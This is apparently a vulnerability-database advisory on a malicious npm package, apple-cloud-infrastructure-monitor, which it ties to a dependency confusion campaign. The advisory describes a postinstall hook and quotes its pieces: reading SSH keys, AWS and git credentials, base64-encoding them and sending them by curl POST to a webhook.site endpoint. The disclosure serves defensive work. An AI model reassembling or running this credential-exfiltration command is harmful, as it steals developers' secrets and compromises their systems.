VDB

GCVE-110-OSM-2026-3339

GCVE-110-OSM-2026-3339
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published April 29, 2026
Exfiltrates SSH private keys, AWS credentials, git credentials, and all environment variables to an attacker-controlled webhook.site endpoint via HTTP POST in a postinstall hook. Published by the same threat actor (raya4321 / npmtpoc@gmail.com) behind the confirmed apple-internal-config dependency confusion campaign targeting Apple engineers. **Trigger** (`postinstall`): shell one-liner executes at install time with no user interaction. **Collection**: reads `~/.ssh/id_rsa`, `~/.aws/credentials`, `~/.git-credentials`, and full environment output (`printenv`). **Encoding**: combined output is base64-encoded via `| base64`. **Exfiltration**: piped to `curl -X POST -d @- https://webhook.site/9a376595-d347-4110-ac32-814e6e2f0754`. **Decoy**: the bundled `index.js` contains only `console.log('Telemetry Service Started...')` with no functional code.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownapple-cloud-infrastructure-monitor1.1.0 (affected)

Browse GCVE Records

72,921 records in the GCVE database · Updated July 15, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›